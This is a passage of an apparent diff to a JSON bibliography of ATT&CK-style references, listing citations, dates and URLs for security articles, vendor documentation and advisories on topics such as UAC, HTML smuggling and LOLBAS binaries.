+ "related": [], + "uuid": "044d0df8-61e4-4a29-8a24-0bd1227d4317", + "value": "Linux Loadable Kernel Module Insert and Remove LKMs" + }, + { + "description": "DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.", + "meta": { + "date_accessed": "2021-04-19T00:00:00Z", + "refs": [ + "https://www.digicert.com/kb/ssl-certificate-installation.htm" + ], + "source": "MITRE", + "title": "How to Install an SSL Certificate" + }, + "related": [], + "uuid": "a1d7d368-6092-4421-99de-44e458deee21", + "value": "DigiCert Install SSL Cert" + }, + { + "description": "Chris Hoffman. (2017, March 8). How to Make Windows Show File Extensions. Retrieved August 4, 2021.", + "meta": { + "date_accessed": "2021-08-04T00:00:00Z", + "date_published": "2017-03-08T00:00:00Z", + "refs": [ + "https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/" + ], + "source": "MITRE", + "title": "How to Make Windows Show File Extensions" + }, + "related": [], + "uuid": "51584201-40a4-4e39-ad23-14453e1eea46", + "value": "HowToGeek ShowExtension" + }, + { + "description": "Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.", + "meta": { + "date_accessed": "2022-06-15T00:00:00Z", + "date_published": "2021-09-24T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer" + ], + "source": "MITRE", + "title": "How to remove entries from the Remote Desktop Connection Computer box" + }, + "related": [], + "uuid": "367d3f80-9b13-44fa-938a-744a95518571", + "value": "Microsoft RDP Removal" + }, + { + "description": "hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2021-09-16T00:00:00Z", + "refs": [ + "https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/" + ], + "source": "MITRE", + "title": "How to run an app or tool at startup" + }, + "related": [], + "uuid": "397be6f9-a109-4185-85f7-8d994fb31eaa", + "value": "Startup Items Eclectic" + }, + { + "description": "Microsoft. (2020, January 23). How to turn off Visual Basic for Applications when you deploy Office. Retrieved September 17, 2020.", + "meta": { + "date_accessed": "2020-09-17T00:00:00Z", + "date_published": "2020-01-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visual-basic-for-application" + ], + "source": "MITRE", + "title": "How to turn off Visual Basic for Applications when you deploy Office" + }, + "related": [], + "uuid": "104db93c-c5cd-431c-ac79-d76cb1694d7c", + "value": "Microsoft Disable VBA Jan 2020" + }, + { + "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.", + "meta": { + "date_accessed": "2016-06-22T00:00:00Z", + "date_published": "2015-08-14T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/kb/249873" + ], + "source": "MITRE", + "title": "How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages" + }, + "related": [], + "uuid": "723ec577-5ea8-4ced-b6c3-b7aaabe1d7e8", + "value": "Microsoft Regsvr32" + }, + { + "description": "Microsoft. (2006, October 30). How to use the SysKey utility to secure the Windows Security Accounts Manager database. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2006-10-30T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/kb/310105" + ], + "source": "MITRE", + "title": "How to use the SysKey utility to secure the Windows Security Accounts Manager database" + }, + "related": [], + "uuid": "bde9acb0-c1c3-44e1-b3b1-cfc0898baead", + "value": "Microsoft SAM" + }, + { + "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.", + "meta": { + "date_accessed": "2022-03-17T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html" + ], + "source": "MITRE", + "title": "How Traffic Mirroring works" + }, + "related": [], + "uuid": "6b77a2f3-39b8-4574-8dee-cde7ba9debff", + "value": "AWS Traffic Mirroring" + }, + { + "description": "Fitzgerald, P. (2010, January 26). How Trojan.Hydraq Stays On Your Computer. Retrieved February 22, 2018.", + "meta": { + "date_accessed": "2018-02-22T00:00:00Z", + "date_published": "2010-01-26T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/how-trojanhydraq-stays-your-computer" + ], + "source": "MITRE", + "title": "How Trojan.Hydraq Stays On Your Computer" + }, + "related": [], + "uuid": "b3ef4b78-2ed6-4cf4-afcc-4e4cb09d806a", + "value": "Symantec Hydraq Persistence Jan 2010" + }, + { + "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.", + "meta": { + "date_accessed": "2019-06-03T00:00:00Z", + "date_published": "2018-11-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works" + ], + "source": "MITRE", + "title": "How User Account Control works" + }, + "related": [], + "uuid": "abda4184-18f9-4799-9c1f-3ba484473e35", + "value": "Microsoft UAC Nov 2018" + }, + { + "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2016-05-31T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works" + ], + "source": "MITRE", + "title": "How User Account Control Works" + }, + "related": [], + "uuid": "bbf8d1a3-115e-4bc8-be43-47ce3b295d45", + "value": "TechNet How UAC Works" + }, + { + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.", + "meta": { + "date_accessed": "2020-09-24T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html" + ], + "source": "MITRE", + "title": "How WellMess malware has been used to target COVID-19 vaccines" + }, + "related": [], + "uuid": "22794e37-3c55-444a-b659-e5a1a6bc2da0", + "value": "PWC WellMess July 2020" + }, + { + "description": "Huntley, S. (2020, October 16). How We're Tackling Evolving Online Threats. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2020-10-16T00:00:00Z", + "refs": [ + "https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats/" + ], + "source": "MITRE", + "title": "How We're Tackling Evolving Online Threats" + }, + "related": [], + "uuid": "8538a963-3e67-47fe-9afd-216b93a2be00", + "value": "Google Election Threats October 2020" + }, + { + "description": "Lich, B., Tobin, J. (2017, April 5). How Windows Defender Credential Guard works. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "date_published": "2017-04-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-works" + ], + "source": "MITRE", + "title": "How Windows Defender Credential Guard works" + }, + "related": [], + "uuid": "aa52db88-5d03-42ae-b371-6210d7079a84", + "value": "Microsoft Credential Guard April 2017" + }, + { + "description": "Grzegorz Tworek. (2021, December 14). How winlogon.exe shares the cleartext password with custom DLLs. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2021-12-14T00:00:00Z", + "refs": [ + "https://www.youtube.com/watch?v=ggY3srD9dYs" + ], + "source": "MITRE", + "title": "How winlogon.exe shares the cleartext password with custom DLLs" + }, + "related": [], + "uuid": "6533d5df-7388-5c59-8c63-0923de34b61d", + "value": "NPPSPY Video" + }, + { + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2019-07-03T00:00:00Z", + "refs": [ + "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html" + ], + "source": "MITRE", + "title": "hreat Spotlight: Sodinokibi Ransomware" + }, + "related": [], + "uuid": "3ad8def7-3a8a-49bb-8f47-dea2e570c99e", + "value": "Cylance Sodinokibi July 2019" + }, + { + "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", + "meta": { + "date_accessed": "2017-10-27T00:00:00Z", + "date_published": "2017-10-14T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/HTML_Application" + ], + "source": "MITRE", + "title": "HTML Application" + }, + "related": [], + "uuid": "f1f76055-91f8-4977-9392-bed347e4f181", + "value": "Wikipedia HTML Application" + }, + { + "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", + "meta": { + "date_accessed": "2017-10-27T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/ms536471.aspx" + ], + "source": "MITRE", + "title": "HTML Applications" + }, + "related": [], + "uuid": "2de103a8-8d72-40f9-b366-b908364dd090", + "value": "MSDN HTML Applications" + }, + { + "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/windows/desktop/ms644670" + ], + "source": "MITRE", + "title": "HTML Help ActiveX Control Overview" + }, + "related": [], + "uuid": "ae5728bd-571a-451f-9ba3-3198067135b4", + "value": "Microsoft HTML Help ActiveX" + }, + { + "description": "Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.", + "meta": { + "date_accessed": "2021-05-20T00:00:00Z", + "date_published": "2018-08-14T00:00:00Z", + "refs": [ + "https://outflank.nl/blog/2018/08/14/html-smuggling-explained/" + ], + "source": "MITRE", + "title": "HTML smuggling explained" + }, + "related": [], + "uuid": "9a99f431-4d15-47f8-a31b-4f98671cd95d", + "value": "Outlflank HTML Smuggling 2018" + }, + { + "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "date_published": "2012-11-19T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/" + ], + "source": "MITRE", + "title": "HTTP iframe Injecting Linux Rootkit" + }, + "related": [], + "uuid": "eb3590bf-ff12-4ccd-bf9d-cf8eacd82135", + "value": "CrowdStrike Linux Rootkit" + }, + { + "description": "Wikipedia. (2017, February 28). HTTP Public Key Pinning. Retrieved March 31, 2017.", + "meta": { + "date_accessed": "2017-03-31T00:00:00Z", + "date_published": "2017-02-28T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning" + ], + "source": "MITRE", + "title": "HTTP Public Key Pinning" + }, + "related": [], + "uuid": "2da110e7-d3a8-433f-87c3-eb744adf811b", + "value": "Wikipedia HPKP" + }, + { + "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.", + "meta": { + "date_accessed": "2021-11-19T00:00:00Z", + "date_published": "2019-01-02T00:00:00Z", + "refs": [ + "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/" + ], + "source": "MITRE", + "title": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/" + }, + "related": [], + "uuid": "e845f741-eabe-469b-97c1-f51a2aeb18b0", + "value": "Cobalt Strike Arguments 2019" + }, + { + "description": "Nick Biasini, Edmund Brumaghin, Chris Neal, and Paul Eubanks. (2021, April 7). https://blog.talosintelligence.com/collab-app-abuse/. Retrieved July 20, 2023.", + "meta": { + "date_accessed": "2023-07-20T00:00:00Z", + "date_published": "2021-04-07T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/collab-app-abuse/" + ], + "source": "MITRE", + "title": "https://blog.talosintelligence.com/collab-app-abuse/" + }, + "related": [], + "uuid": "affa93d8-5c8b-557d-80b4-1366df13d77a", + "value": "Talos Discord Webhook Abuse" + }, + { + "description": "Donohue, B.. (2019, February 13). https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2019-02-13T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/" + ], + "source": "MITRE", + "title": "https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/" + }, + "related": [], + "uuid": "132915dc-d906-4c23-b1e3-885af817b840", + "value": "Red Canary Emotet Feb 2019" + }, + { + "description": "Microsoft. (2007, August 31). https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "date_published": "2007-08-31T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx" + ], + "source": "MITRE", + "title": "https://technet.microsoft.com/en-us/library/cc771759(v=ws.10).aspx" + }, + "related": [], + "uuid": "db86cd0a-1188-4079-afed-1f986166a2e7", + "value": "TechNet Removable Media Control" + }, + { + "description": "Chromium. (n.d.). HTTP Strict Transport Security. Retrieved May 24, 2023.", + "meta": { + "date_accessed": "2023-05-24T00:00:00Z", + "refs": [ + "https://www.chromium.org/hsts/" + ], + "source": "MITRE", + "title": "HTTP Strict Transport Security" + }, + "related": [], + "uuid": "1ad03be3-d863-5a55-a371-42b6d3b7ed31", + "value": "Chromium HSTS" + }, + { + "description": "CISA, FBI, CNMF. (2020, October 27). https://us-cert.cisa.gov/ncas/alerts/aa20-301a. Retrieved November 4, 2020.", + "meta": { + "date_accessed": "2020-11-04T00:00:00Z", + "date_published": "2020-10-27T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + ], + "source": "MITRE", + "title": "https://us-cert.cisa.gov/ncas/alerts/aa20-301a" + }, + "related": [], + "uuid": "685aa213-7902-46fb-b90a-64be5c851f73", + "value": "CISA AA20-301A Kimsuky" + }, + { + "description": "Singh, S., Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved April 5, 2018.", + "meta": { + "date_accessed": "2018-04-05T00:00:00Z", + "date_published": "2016-05-22T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ], + "source": "MITRE", + "title": "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + }, + "related": [], + "uuid": "fedb3a9d-4f9e-495c-ac92-d5457688608d", + "value": "FireEye Targeted Attacks Middle East Banks" + }, + { + "description": "Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2017-05-04T00:00:00Z", + "refs": [ + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a" + ], + "source": "MITRE", + "title": "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a" + }, + "related": [], + "uuid": "8fb3ef2f-3652-4563-8921-2c601d1b9bc9", + "value": "Forbes Dyre May 2017" + }, + { + "description": "Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.", + "meta": { + "date_accessed": "2023-09-05T00:00:00Z", + "date_published": "2022-08-24T00:00:00Z", + "refs": [ + "https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121" + ], + "source": "MITRE", + "title": "Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps" + }, + "related": [], + "uuid": "e5944e4c-76c6-55d1-97ec-8367b7f98c28", + "value": "Microsoft Subscription Hijacking 2022" + }, + { + "description": "Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.", + "meta": { + "date_accessed": "2022-10-18T00:00:00Z", + "date_published": "2022-05-25T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/" + ], + "source": "MITRE", + "title": "Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun" + }, + "related": [], + "uuid": "f68a59a1-cb07-4f58-b755-25c91938b611", + "value": "crowdstrike bpf socket filters" + }, + { + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2021-09-07T00:00:00Z", + "refs": [ + "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + ], + "source": "MITRE", + "title": "Hunting Cobalt Strike C2 with Shodan" + }, + "related": [], + "uuid": "e3984769-f6d7-43dd-8179-7df9d441512e", + "value": "Koczwara Beacon Hunting Sep 2021" + }, + { + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "meta": { + "date_accessed": "2019-06-10T00:00:00Z", + "date_published": "2019-06-04T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + ], + "source": "MITRE", + "title": "Hunting COM Objects" + }, + "related": [], + "uuid": "84311e46-cea1-486a-a737-c4a4946ab837", + "value": "Fireeye Hunting COM June 2019" + }, + { + "description": "Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.", + "meta": { + "date_accessed": "2023-03-20T00:00:00Z", + "date_published": "2022-01-30T00:00:00Z", + "refs": [ + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "source": "MITRE", + "title": "Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron" + }, + "related": [], + "uuid": "7dfd6a67-3935-506a-8661-1caa7eb508e2", + "value": "Berba hunting linux systemd" + }, + { + "description": "Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.", + "meta": { + "date_accessed": "2017-12-07T00:00:00Z", + "date_published": "2017-06-13T00:00:00Z", + "refs": [ + "https://www.endgame.com/blog/technical-blog/hunting-memory" + ], + "source": "MITRE", + "title": "Hunting in Memory" + }, + "related": [], + "uuid": "8cd58716-4ff1-4ba2-b980-32c52cf7dee8", + "value": "Elastic HuntingNMemory June 2017" + }, + { + "description": "LogPoint. (n.d.). Hunting LockBit Variations using Logpoint. Retrieved May 19, 2023.", + "meta": { + "date_accessed": "2023-05-19T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.logpoint.com/wp-content/uploads/2022/10/hunting-lockbit-variations-using-logpoint-.pdf" + ], + "source": "Tidal Cyber", + "title": "Hunting LockBit Variations using Logpoint" + }, + "related": [], + "uuid": "22aa7792-6296-4f16-826f-d0f1c55ddb2a", + "value": "LogPoint Hunting LockBit" + }, + { + "description": "FBI et al. (2023, May 9). Hunting Russian Intelligence “Snake” Malware. Retrieved June 8, 2023.", + "meta": { + "date_accessed": "2023-06-08T00:00:00Z", + "date_published": "2023-05-09T00:00:00Z", + "refs": [ + "https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf" + ], + "source": "MITRE", + "title": "Hunting Russian Intelligence “Snake” Malware" + }, + "related": [], + "uuid": "1931b80a-effb-59ec-acae-c0f17efb8cad", + "value": "Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023" + }, + { + "description": "Hybrid Analysis. (2018, July 11). HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "date_published": "2018-07-11T00:00:00Z", + "refs": [ + "https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300" + ], + "source": "MITRE", + "title": "HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7" + }, + "related": [], + "uuid": "f27ab4cb-1666-501a-aa96-537d2b2d1f08", + "value": "Falcon Sandbox smp: 28553b3a9d" + }, + { + "description": "Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016.", + "meta": { + "date_accessed": "2016-06-11T00:00:00Z", + "date_published": "2016-05-23T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Hypervisor" + ], + "source": "MITRE", + "title": "Hypervisor" + }, + "related": [], + "uuid": "1a6ae877-ef30-4d40-abd0-fde308f1a1f0", + "value": "Wikipedia Hypervisor" + }, + { + "description": "Bierstock, D., Baker, A. (2019, March 21). I am AD FS and So Can You. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2019-03-21T00:00:00Z", + "refs": [ + "https://www.troopers.de/troopers19/agenda/fpxwmn/" + ], + "source": "MITRE", + "title": "I am AD FS and So Can You" + }, + "related": [], + "uuid": "6891eaf4-6857-4106-860c-1708d2a3bd33", + "value": "FireEye ADFS" + }, + { + "description": "Amazon Web Services. (n.d.). IAM roles for service accounts. Retrieved July 14, 2023.", + "meta": { + "date_accessed": "2023-07-14T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html" + ], + "source": "MITRE", + "title": "IAM roles for service accounts" + }, + "related": [], + "uuid": "b2452f0e-93b0-55b7-add8-8338d171f0bf", + "value": "AWS EKS IAM Roles for Service Accounts" + }, + { + "description": "Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "2020-10-15T00:00:00Z", + "refs": [ + "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + ], + "source": "MITRE", + "title": "IAmTheKing and the SlothfulMedia malware family" + }, + "related": [], + "uuid": "fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a", + "value": "Kaspersky IAmTheKing October 2020" + }, + { + "description": "Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + "source": "MITRE", + "title": "IAM user groups" + }, + "related": [], + "uuid": "16f6b02a-912b-42c6-8d32-4e4f11fa70ec", + "value": "Amazon IAM Groups" + }, + { + "description": "CrowdStrike. (2022, May). ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK. Retrieved June 27, 2022.", + "meta": { + "date_accessed": "2022-06-27T00:00:00Z", + "date_published": "2022-05-01T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/wp-content/uploads/2022/05/crowdstrike-iceapple-a-novel-internet-information-services-post-exploitation-framework.pdf" + ], + "source": "MITRE", + "title": "ICEAPPLE: A NOVEL INTERNET INFORMATION SERVICES (IIS) POST-EXPLOITATION FRAMEWORK" + }, + "related": [], + "uuid": "325988b8-1c7d-4296-83d6-bfcbe533b75e", + "value": "CrowdStrike IceApple May 2022" + }, + { + "description": "Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.", + "meta": { + "date_accessed": "2018-06-07T00:00:00Z", + "date_published": "2016-07-28T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" + ], + "source": "MITRE", + "title": "ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts" + }, + "related": [], + "uuid": "1a824860-6978-454d-963a-a56414a4312b", + "value": "ICIT China's Espionage Jul 2016" + }, + { + "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.", + "meta": { + "date_accessed": "2020-12-07T00:00:00Z", + "date_published": "2010-09-10T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01" + ], + "source": "MITRE", + "title": "ICS Advisory (ICSA-10-272-01)" + }, + "related": [], + "uuid": "25b3c18c-e017-4773-91dd-b489220d4fcb", + "value": "CISA ICS Advisory ICSA-10-272-01" + }, + { + "description": "US-CERT. (2016, February 25). ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2016-02-25T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ics/alerts/IR-ALERT-H-16-056-01" + ], + "source": "MITRE", + "title": "ICS Alert (IR-ALERT-H-16-056-01) Cyber-Attack Against Ukrainian Critical Infrastructure" + }, + "related": [], + "uuid": "403ea040-8c08-423f-99cb-d7e7852c16e4", + "value": "US-CERT Ukraine Feb 2016" + }, + { + "description": "Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.", + "meta": { + "date_accessed": "2021-02-25T00:00:00Z", + "refs": [ + "https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770" + ], + "source": "MITRE", + "title": "ICS Cybersecurity Year in Review 2020" + }, + "related": [], + "uuid": "8bb3147c-3178-4449-9978-f1248b1bcb0a", + "value": "Dragos Threat Report 2020" + }, + { + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2008-06-10T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3" + ], + "source": "MITRE", + "title": "Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities" + }, + "related": [], + "uuid": "ed7897e5-21f0-49fa-9b26-c397eaebc88a", + "value": "Cisco Advisory SNMP v3 Authentication Vulnerabilities" + }, + { + "description": "Flylib. (n.d.). Identifying Resource and Data Forks. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "refs": [ + "https://flylib.com/books/en/4.395.1.192/1/" + ], + "source": "MITRE", + "title": "Identifying Resource and Data Forks" + }, + "related": [], + "uuid": "b8eaf053-40e0-414e-a89e-409dbf218554", + "value": "Resource and Data Forks" + }, + { + "description": "Amazon. (n.d.). Identity Federation in AWS. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "refs": [ + "https://aws.amazon.com/identity/federation/" + ], + "source": "MITRE", + "title": "Identity Federation in AWS" + }, + "related": [], + "uuid": "b55ac071-483b-4802-895f-ea4eaac1de92", + "value": "AWS Identity Federation" + }, + { + "description": "Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/dd207691.aspx" + ], + "source": "MITRE", + "title": "IDL_DRSGetNCChanges (Opnum 3)" + }, + "related": [], + "uuid": "410570e4-b578-4838-a25d-f03d92fcf3cb", + "value": "Microsoft GetNCCChanges" + }, + { + "description": "LOLBAS. (2018, May 25). Ie4uinit.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/" + ], + "source": "Tidal Cyber", + "title": "Ie4uinit.exe" + }, + "related": [], + "uuid": "01f9a368-5933-47a1-85a9-e5883a5ca266", + "value": "Ie4uinit.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Ieadvpack.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Ieadvpack/" + ], + "source": "Tidal Cyber", + "title": "Ieadvpack.dll" + }, + "related": [], + "uuid": "79943a49-23d6-499b-a022-7c2f8bd68aee", + "value": "Ieadvpack.dll - LOLBAS Project" + }, + { + "description": "LOLBAS. (2022, March 29). iediagcmd.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-03-29T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/" + ], + "source": "Tidal Cyber", + "title": "iediagcmd.exe" + }, + "related": [], + "uuid": "de238a18-2275-497e-adcf-453a016a24c4", + "value": "iediagcmd.exe - LOLBAS Project" + }, + { + "description": "Wikipedia. (2018, March 30). IEEE 802.1X. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2018-03-30T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/IEEE_802.1X" + ], + "source": "MITRE", + "title": "IEEE 802.1X" + }, + "related": [], + "uuid": "5d382527-ffbd-486e-adbe-d60508567281", + "value": "Wikipedia 802.1x" + }, + { + "description": "LOLBAS. (2018, May 25). Ieexec.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": 